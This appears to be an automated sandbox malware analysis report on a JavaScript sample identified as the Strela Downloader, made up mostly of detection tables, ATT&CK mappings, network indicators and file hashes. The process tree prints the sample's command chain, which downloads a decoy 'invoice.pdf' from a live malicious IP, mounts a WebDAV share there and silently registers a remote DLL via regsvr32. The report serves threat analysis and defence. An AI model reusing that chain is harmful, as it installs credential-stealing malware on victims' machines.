Windows
Analysis Report
2812430594697516427.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7080 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\28124 3059469751 6427.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6160 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\153 8123821005 4.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3612 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 2196 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 980 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7220 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 44 --field -trial-han dle=1768,i ,105015704 7884938903 8,12289448 5324146357 82,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 1344 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588681 |
Start date and time: | 2025-01-11 04:05:45 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 51s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2812430594697516427.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 18.213.11.84, 54.224.241.105, 34.237.241.83, 50.16.47.176, 2.16.168.107, 2.16.168.105, 172.64.41.3, 162.159.61.3, 2.23.242.162, 23.209.209.135, 23.46.156.25, 23.46.156.16, 192.168.2.4, 52.149.20.212, 23.56.162.204, 172.202.163.200, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
22:06:39 | API Interceptor | |
22:06:43 | API Interceptor | |
22:06:43 | API Interceptor | |
22:06:55 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073729625148665 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrt:KooCEYhgYEL0In |
MD5: | 5F8EBAF78A2E5B9051B9F6D5F87DABAA |
SHA1: | 14B7B74676026A7F494AD6001E2E7559D535366B |
SHA-256: | 4185D28E53B94497A3C539D0C7450109BF4FAEBF5327580A723F58DBE3959CFC |
SHA-512: | BFF9F4624DAFD1048ABB7DFE2118ECECA84F3AC9832AF5E21D730D25DD055BDC9F3F348A0BA147E5908CE85CB4E4EF7942F64FE44EDB5991E7D5332612F9F354 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.42211141621623594 |
Encrypted: | false |
SSDEEP: | 1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO |
MD5: | 122EA283C3A6781D53DEE3B9313643BC |
SHA1: | 5189B459BD40BA41F4F77BCC1283E62EAEB7629F |
SHA-256: | 31591C6E9997278E76E138E4B6D53FC55E26C800771877EBC1626714CE174DD0 |
SHA-512: | 78F57DE00542AD0EDAE9130BF001CD486D4277B1FB5BF42AA17E69744A7ED2A7D202CA6C53C36CD1E5219C58E33073BE809701283353CA0FFCD9CA446659A317 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07657424140924843 |
Encrypted: | false |
SSDEEP: | 3:kOlKYe+Juvejjn13a/ZbM4/AllcVO/lnlZMxZNQl:kOlKzuuGj53qZM4AOewk |
MD5: | 10230EF27E5D5E2890A07D4F11F3FDD6 |
